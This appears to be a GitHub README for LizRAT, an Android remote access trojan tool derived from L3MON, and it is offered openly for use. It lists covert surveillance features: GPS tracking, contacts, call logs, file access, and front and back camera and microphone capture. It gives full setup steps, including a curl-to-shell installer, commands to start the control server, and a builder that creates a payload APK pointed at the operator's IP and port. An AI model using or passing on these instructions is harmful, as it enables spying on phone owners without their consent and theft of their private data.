This is a Android RAT tool inspired from L3MON. I Developed This tool to add some new features Like Camera Caputure & Recording. I am NOT RESPONSIBLE if you use this tool to commit any crime.
I as Bhartiya Hacker do not pressurize the LizRAT Tool in any way. My moral obligation is to send all types of rights and donations directly to the original crater. I sincerely thank you for allowing me to upload this tool to my GitHub. I have enabled LizRAT to support termux with a few minor changes.
Now users no longer need to sign the LizRAT payload using Apk Editor. If you are a Termux user, you will be able to easily build the payload of LizRAT with the help of this repository, as well as use it in Kali Linux and Ubuntu without any errors. If you are a Kali or Ubuntu user, you need to have Java8 Installed on your machine or follow the rootless installation.
The only way to help me is to visit my YouTube channel and subscribe to my channel, leave your comments on our videos, and follow me on GitHub. Looking forward to your cooperation.
. GPS Logging
. Contacts Informations
. Call Logs
. File Manager
. Camera Acces (Both Front & Back)
. Mic Access
. Payload Builder removed
. Added New builder script written in Bash for both Termux & Linux.
. Now supports java 17. No need to install java 8
. one click installercurl -s https://raw.githubusercontent.com/Bhartiya-Hacker/Liz-RAT/master/install.sh | sh. After the instllation complete first start the server by typing 'liz' in TERMUX or by Typing "pm2 start index.js" in Linux & stop it by typing 'lizx' or "pm2 stop index.js", This will create a file
called 'maindb.json' in lizrat directory. which is in TERMUX '/usr/opt/lizrat'
. Now, Go to the lizrat directory and search for the file named "maindb.json".
. You have to edit this file to set 'username' & 'Password'.
. open that file with any editor and change the usernmae from 'admin' to whater you want like 'xyz'.
. Now, in password field first you have to first convert your password into 'md5hash' then you will have to paste it in that
file. Example:- if the password is 'admin' then convert it into 'md5hash' by going to any website like
https://www.md5hashgenerator.com/ Then copy that hash and paste it in the password field.
. Again restart the server by typing 'liz' to login with your new credentials.. Type "lizb" anywhere to start building the payload. no need to start the server its totally offline.
. Type the IP & PORT and wait for the build to complete.
. after the built, apk can be found at home directory under lizrat_output
. "Lizrat_output" folder is not found then plz check if "apktool" is installed properly or not". run 'builder_linux.sh' which is inside lizrat directory to start building the payload. no need to start the server its
totally offline.
. Type the IP & PORT and wait for the build to complete.
. after the built, apk can be found at home directory under /home/$USER/lizrat_output
. "Lizrat_output" folder is not found then plz check if "apktool" is installed properly or not by typing apktool". To Start the server type "liz"
. To build the payload type "lizb"
. To stop the server type "lizx". Clone the Repository.
. Install Any java (java 8:Recommend)
. Install Nodejs & npm:
apt-get install nodejs npm
. Install pm2 globaly(IMP):
npm install pm2 -g
. cd to "lizrat" Directory and type "npm install" to install all the required bundle & wait for the npm installation to
complete
. Start Server: Type "pm2 start index.js" in lizrat directory.
. Stop Server: Type "Pm2 stop index.js" in lizrat directory